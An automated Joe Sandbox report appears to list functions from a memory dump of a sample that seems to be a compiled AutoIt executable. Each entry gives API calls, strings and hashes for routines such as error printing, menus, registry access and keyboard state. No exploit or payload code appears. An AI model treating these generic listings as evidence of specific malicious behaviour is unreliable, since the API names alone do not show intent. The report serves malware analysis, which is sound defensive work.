Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: e14c3d2f7833b0be5fceae50580f4833564d1725232e2247693e09f6ade060b3
Instruction ID: 678a020359c2a2f0943d09c8321f254cfa83a4adfb06ae2ca31cbcd1f4a90e9e
Opcode Fuzzy Hash: e14c3d2f7833b0be5fceae50580f4833564d1725232e2247693e09f6ade060b3
Instruction Fuzzy Hash: 6F513976A00309EFCB14CFA8C885EAFBBB9EF48710F14851EF95A97250C731A941CB50

Function 00A5CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00A5CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 00A5CCC5
__swprintf.LIBCMT ref: 00A5CD1E
__swprintf.LIBCMT ref: 00A5CD37
_wprintf.LIBCMT ref: 00A5CDED
_wprintf.LIBCMT ref: 00A5CE0B

Strings

Error: , xrefs: 00A5CDB5
^ ERROR, xrefs: 00A5CD8F
Line %d (File "%s"):, xrefs: 00A5CD18, 00A5CD31
"%s" (%d) : ==> %s:%s%s, xrefs: 00A5CDE8
"%s" (%d) : ==> %s:, xrefs: 00A5CE06

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 4aad42f038bf1d35a34b2b869f2aea28998f9414cef1684c3c61e708734d5b8b
Instruction ID: 23bbea82c843231995dd1429bdcd0b82c01902dbc423f7f5617d22c3e910c420
Opcode Fuzzy Hash: 4aad42f038bf1d35a34b2b869f2aea28998f9414cef1684c3c61e708734d5b8b
Instruction Fuzzy Hash: 19514F32900219BACF15FBE0DE46EEEB778BF05354F104165F905721A2EB316E99DB60

Function 00A5CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00A5CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A5CAB0
__swprintf.LIBCMT ref: 00A5CB09
__swprintf.LIBCMT ref: 00A5CB22
_wprintf.LIBCMT ref: 00A5CBCD
_wprintf.LIBCMT ref: 00A5CBEB

Strings

Error: , xrefs: 00A5CB95
^ ERROR , xrefs: 00A5CB64
Line %d (File "%s"):, xrefs: 00A5CB03, 00A5CB1C
"%s" (%d) : ==> %s:%s%s, xrefs: 00A5CBC8
"%s" (%d) : ==> %s:, xrefs: 00A5CBE6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: e16872617e8ca4480699acbbf18c45694f59bbd7ea7cd29a7458454b24ea8814
Instruction ID: 2da9ba788cf65f05a01a94337bd3506662099049d5d279ec368cf1356bd73ba1
Opcode Fuzzy Hash: e16872617e8ca4480699acbbf18c45694f59bbd7ea7cd29a7458454b24ea8814
Instruction Fuzzy Hash: 1D517A32900209BACF15FBE0DE46EEEB778BF04350F104166B506720A2EB356F99DB61

Function 00A555BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A555D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00A55664
GetMenuItemCount.USER32(00AD1708), ref: 00A556ED
DeleteMenu.USER32(00AD1708,00000005,00000000,000000F5,?,?), ref: 00A5577D
DeleteMenu.USER32(00AD1708,00000004,00000000), ref: 00A55785
DeleteMenu.USER32(00AD1708,00000006,00000000), ref: 00A5578D
DeleteMenu.USER32(00AD1708,00000003,00000000), ref: 00A55795
GetMenuItemCount.USER32(00AD1708), ref: 00A5579D
SetMenuItemInfoW.USER32(00AD1708,00000004,00000000,00000030), ref: 00A557D3
GetCursorPos.USER32(?), ref: 00A557DD
SetForegroundWindow.USER32(00000000), ref: 00A557E6
TrackPopupMenuEx.USER32(00AD1708,00000000,?,00000000,00000000,00000000), ref: 00A557F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A55805

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: e03528b990e1aa706d07a94928ef09288fbce4cbaf14b013e436ba1b82bfcf95
Instruction ID: 86824cec9ce617e8374252183b8a775c8282523234ed25d6a4ed6dc6d938c79d
Opcode Fuzzy Hash: e03528b990e1aa706d07a94928ef09288fbce4cbaf14b013e436ba1b82bfcf95
Instruction Fuzzy Hash: DD710570A40645BFEB209F74DC59FAABF65FF04369F280206FA156A1D1C7705C58DB90

Function 00A4A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A4A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A4A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A4A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A4A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A4A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00A4A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A4A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A4A2AB

Strings

SOFTWARE\Classes\, xrefs: 00A4A17D
\IPC$, xrefs: 00A4A1F3
\CLSID, xrefs: 00A4A193

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 5c21d6164c32d678e609bf19655497539206b84e51fae573bee4d29cf3901abd
Instruction ID: c2cd3d1e446406a773d5a99b3aed23411707abc95d85689b63f9a637b426dc86
Opcode Fuzzy Hash: 5c21d6164c32d678e609bf19655497539206b84e51fae573bee4d29cf3901abd
Instruction Fuzzy Hash: B941F576C10229ABDB15EBA4DD85DEEB7B8FF54340F00412AE902B71A1EB709E45CB50

Function 00A73C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A72BB5,?,?), ref: 00A73C1D

Strings

HKU, xrefs: 00A73D15
HKCR, xrefs: 00A73CAB
HKEY_CURRENT_CONFIG, xrefs: 00A73CC0
HKCC, xrefs: 00A73CD1
HKEY_CLASSES_ROOT, xrefs: 00A73C96
HKCU, xrefs: 00A73CF3
HKEY_LOCAL_MACHINE, xrefs: 00A73C6C
HKLM, xrefs: 00A73C81
HKEY_USERS, xrefs: 00A73D04
HKEY_CURRENT_USER, xrefs: 00A73CE2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 2232591a3e53b173789a0df091af637c643e4d578933de09e62b90c4be5d9989
Instruction ID: 3248ed3e6d6df788a8daa20844c4d6b49e7ac8030a7fbe1af5ac503ac89d8676
Opcode Fuzzy Hash: 2232591a3e53b173789a0df091af637c643e4d578933de09e62b90c4be5d9989
Instruction Fuzzy Hash: 2841933110024A9BCF10EF54ED51AEB3365EF26340F12C828FC595B292EB709E4ADB50

Function 00A525B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A836F4,00000010,?,Bad directive syntax error,00AADC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A525D6
LoadStringW.USER32(00000000,?,00A836F4,00000010), ref: 00A525DD
_wprintf.LIBCMT ref: 00A52610
__swprintf.LIBCMT ref: 00A52632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A526A1

Strings

Error: , xrefs: 00A5266F
%s (%d) : ==> %s.: %s %s, xrefs: 00A5260B
Line %d (File "%s"):, xrefs: 00A52647
., xrefs: 00A52687
Line %d:, xrefs: 00A5262C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: ae525c1c47dc5861039a90bc838a090ccfbf1ab8a0045a051d5aab1efeb0a7f9
Instruction ID: aebf9358ec57465086b9b80841ed7de8ff4a4b506aeec535e8592c262578b2dd
Opcode Fuzzy Hash: ae525c1c47dc5861039a90bc838a090ccfbf1ab8a0045a051d5aab1efeb0a7f9
Instruction Fuzzy Hash: 6E214D3294021AFFCF15BB90CD4AFEE7739FF19304F044459F505660A2DA71A659DB50

Function 00A57AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A57B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A57B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A57B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A57B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A57B8C

Strings

open , xrefs: 00A57AF1
close PlayMe, xrefs: 00A57B53, 00A57B80
play PlayMe, xrefs: 00A57B87
status PlayMe mode, xrefs: 00A57B3D
alias PlayMe, xrefs: 00A57B1B
play PlayMe wait, xrefs: 00A57B76

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 898924e8d39d2590f09f5deb82fea875b7c675c26d8e5d1fcfe8573e255b6157
Instruction ID: 7734621e9c292832e8645289cdbbf35c5d0dc3cb6afe820851180fb5f374cf52
Opcode Fuzzy Hash: 898924e8d39d2590f09f5deb82fea875b7c675c26d8e5d1fcfe8573e255b6157
Instruction Fuzzy Hash: 861198A1A5026979DB20F761DD4AEFFBA7CFBD1B10F0109197412B70D1DE701A89C5B0

Function 00A5778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A57794

Part of subcall function 00A2DC38: timeGetTime.WINMM(?,76C1B400,00A858AB), ref: 00A2DC3C

Sleep.KERNEL32(0000000A), ref: 00A577C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00A577E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00A57806
SetActiveWindow.USER32 ref: 00A57825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A57833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00A57852
Sleep.KERNEL32(000000FA), ref: 00A5785D
IsWindow.USER32 ref: 00A57869
EndDialog.USER32(00000000), ref: 00A5787A

Strings

BUTTON, xrefs: 00A577F8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 64e39a01797ba51c2dc6dddc08304317ed6dab9ef6bdb4bf28a87dd05c434a58
Instruction ID: dbc5fefe418bc268be59818305ece7423621b56600acfad3e6aa919ae5d7bfb9
Opcode Fuzzy Hash: 64e39a01797ba51c2dc6dddc08304317ed6dab9ef6bdb4bf28a87dd05c434a58
Instruction Fuzzy Hash: 68213072205205BFEB01DFA0FE89B2A3F69FB4434AF040416F90696162DF715D8ADB21

Function 00A602EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

CoInitialize.OLE32(00000000), ref: 00A6034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A603DE
SHGetDesktopFolder.SHELL32(?), ref: 00A603F2
CoCreateInstance.OLE32(00A9DA8C,00000000,00000001,00AC3CF8,?), ref: 00A6043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A604AD
CoTaskMemFree.OLE32(?,?), ref: 00A60505
_memset.LIBCMT ref: 00A60542
SHBrowseForFolderW.SHELL32(?), ref: 00A6057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A605A1
CoTaskMemFree.OLE32(00000000), ref: 00A605A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A605DF
CoUninitialize.OLE32(00000001,00000000), ref: 00A605E1

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 516026a25855361a7c5a4fa6b4ae480f3917595cb3f239eea12dd4b89094befd
Instruction ID: 46c543fd6eb0b111b1d1bc468af2e252c7305ba6cbd43f7c317166265c022a41
Opcode Fuzzy Hash: 516026a25855361a7c5a4fa6b4ae480f3917595cb3f239eea12dd4b89094befd
Instruction Fuzzy Hash: 28B1FC75A00208AFDB14DFA4C988DAEBBB9FF48315B148499F816EB251DB30ED85CF50

Function 00A52E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A52ED6
SetKeyboardState.USER32(?), ref: 00A52F41
GetAsyncKeyState.USER32(000000A0), ref: 00A52F61
GetKeyState.USER32(000000A0), ref: 00A52F78
GetAsyncKeyState.USER32(000000A1), ref: 00A52FA7
GetKeyState.USER32(000000A1), ref: 00A52FB8
GetAsyncKeyState.USER32(00000011), ref: 00A52FE4
GetKeyState.USER32(00000011), ref: 00A52FF2
GetAsyncKeyState.USER32(00000012), ref: 00A5301B
GetKeyState.USER32(00000012), ref: 00A53029
GetAsyncKeyState.USER32(0000005B), ref: 00A53052
GetKeyState.USER32(0000005B), ref: 00A53060

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 5994f3985539ee97595dff7f698ead0216dc4fd0cc1ad12d7cffbefb05615f3f
Instruction ID: 463eaf98ccefa84e28017a7c79846bc39f9c146a883254455d1de833824f585f
Opcode Fuzzy Hash: 5994f3985539ee97595dff7f698ead0216dc4fd0cc1ad12d7cffbefb05615f3f
Instruction Fuzzy Hash: BB51F721A0478429FF35DBA489117EABFF47F52385F08459ECDC2561C2DAB49B8CC7A2

Function 00A4ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00A4ED1E
GetWindowRect.USER32(00000000,?), ref: 00A4ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A4ED8E
GetDlgItem.USER32(?,00000002), ref: 00A4ED99
GetWindowRect.USER32(00000000,?), ref: 00A4EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A4EE01
GetDlgItem.USER32(?,000003E9), ref: 00A4EE0F
GetWindowRect.USER32(00000000,?), ref: 00A4EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A4EE63
GetDlgItem.USER32(?,000003EA), ref: 00A4EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A4EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 00A4EE9B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: db2980428b4962d8943e47cbad035b37480af0464ec3f10d858e9546c0ddb2a7
Instruction ID: 2cf21227b9d72c7f8f1c0aea89ee4c761a11f519e61067e08f9da20c713cc1ed
Opcode Fuzzy Hash: db2980428b4962d8943e47cbad035b37480af0464ec3f10d858e9546c0ddb2a7
Instruction Fuzzy Hash: A6511175B10205AFDF18CFA9DD85AAEBBBAFB88700F14812DF619D7290DB709D418B10

Function 00A2B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A2B759,?,00000000,?,?,?,?,00A2B72B,00000000,?), ref: 00A2BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A2B72B), ref: 00A2B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00A2B72B,00000000,?,?,00A2B2EF,?,?), ref: 00A2B88D
DestroyAcceleratorTable.USER32(00000000), ref: 00A8D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A2B72B,00000000,?,?,00A2B2EF,?,?), ref: 00A8D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A2B72B,00000000,?,?,00A2B2EF,?,?), ref: 00A8D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A2B72B,00000000,?,?,00A2B2EF,?,?), ref: 00A8D90A
DeleteObject.GDI32(00000000), ref: 00A8D91C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ec919569d891ac79ca555823bdda8d78b9764404c04241514dd9edb9e461491a
Instruction ID: fdd2a164bf2b8b28c214b6b87e8a1d72daff42b6a298a0e4104e11bb8247f31f
Opcode Fuzzy Hash: ec919569d891ac79ca555823bdda8d78b9764404c04241514dd9edb9e461491a
Instruction Fuzzy Hash: DE617D30622610EFDB25EF58E988B25B7F5FF94311F14452EE14687AB0CB30A891DF50

Function 00A2B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00A2B526: GetWindowLongW.USER32(?,000000EB), ref: 00A2B537

GetSysColor.USER32(0000000F), ref: 00A2B438

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 4f77b24467c3bb3ba1e7b0d2e6577f2d02ed6af899e0c4716db578cb3206a5de
Instruction ID: f9bb3d10f21f4e5a6e7224888adfd4ff27a968be89463b6b3b8f58584ebf68d2
Opcode Fuzzy Hash: 4f77b24467c3bb3ba1e7b0d2e6577f2d02ed6af899e0c4716db578cb3206a5de
Instruction Fuzzy Hash: BB419031111160AFDB21AF6CECC9BB93B65AB06721F184366FD658E1E6DB308C82D731

Function 00A5690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00A56923
_wcscpy.LIBCMT ref: 00A56934
__wsplitpath.LIBCMT ref: 00A56958
__wsplitpath.LIBCMT ref: 00A56979
_wcscpy.LIBCMT ref: 00A5699B
_wcscpy.LIBCMT ref: 00A569B9
